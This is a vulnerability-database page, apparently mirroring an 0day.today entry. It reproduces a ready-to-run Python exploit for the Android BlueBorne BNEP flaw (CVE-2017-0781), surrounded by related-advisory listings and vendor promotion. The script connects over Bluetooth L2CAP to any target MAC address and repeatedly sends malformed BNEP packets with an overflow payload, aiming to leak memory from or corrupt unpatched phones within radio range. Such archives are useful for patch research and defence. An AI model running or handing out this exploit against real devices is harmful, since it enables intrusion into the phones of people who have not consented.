Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Android Bluetooth - Blueborne Information Leak (1) Exploit

🗓️ 29 Apr 2018 00:00:00Reported by Kert OjasooType 
zdt
 zdt🔗 0day.today👁 220 Views

Android Bluetooth Blueborne Information Leak Exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today		LineageOS 14.1 Blueborne - Remote Code Execution Vulnerability
7 Apr 201800:00
zdt
GithubExploit		Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Google Android
22 Sep 201722:03
githubexploit
GithubExploit		Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Google Android
21 Mar 202607:17
githubexploit
Gitee		Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Google Android
27 Jul 202504:17
gitee
Gitee		Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Google Android
6 Sep 202511:51
gitee
android		CVE-2017-0781
1 Sep 201700:00
android
BDU FSTEC		The vulnerability of the Bluetooth Network Encapsulation Protocol (BNEP) in the Android operating system allows a hacker to execute arbitrary code within the context of a privileged process.
15 Sep 201700:00
bdu_fstec
Circl		CVE-2017-0781
15 Nov 201723:04
circl
CNVD		Android BNEP Remote Code Execution Vulnerability
13 Sep 201700:00
cnvd
CVE		CVE-2017-0781
14 Sep 201719:00
cve
Rows per page
from pwn import *
import bluetooth
 
if not 'TARGET' in args:
    log.info('Usage: python CVE-2017-0781.py TARGET=XX:XX:XX:XX:XX:XX')
    exit()
 
target = args['TARGET']
 
count = 30 # Amount of packets to send
 
port = 0xf # BT_PSM_BNEP
context.arch = 'arm'
BNEP_FRAME_CONTROL = 0x01
BNEP_SETUP_CONNECTION_REQUEST_MSG = 0x01
 
def set_bnep_header_extension_bit(bnep_header_type):
    """
    If the extension flag is equal to 0x1 then
    one or more extension headers follows the BNEP
    header; If extension flag is equal to 0x0 then the
    BNEP payload follows the BNEP header.
    """
    return bnep_header_type | 128
 
def bnep_control_packet(control_type, control_packet):
    return p8(control_type) + control_packet
 
def packet(overflow):
    pkt = ''
    pkt += p8(set_bnep_header_extension_bit(BNEP_FRAME_CONTROL))
    pkt += bnep_control_packet(BNEP_SETUP_CONNECTION_REQUEST_MSG, '\x00' + overflow)
    return pkt
 
bad_packet = packet('AAAABBBB')
 
log.info('Connecting...')
sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
bluetooth.set_l2cap_mtu(sock, 1500)
sock.connect((target, port))
 
log.info('Sending BNEP packets...')
for i in range(count):
    sock.send(bad_packet)
 
log.success('Done.')
sock.close()

#  0day.today [2018-04-30]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Apr 2018 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.42427
bluetoothblueborneinformation leakexploitcve-2017-0781bnepl2cap
220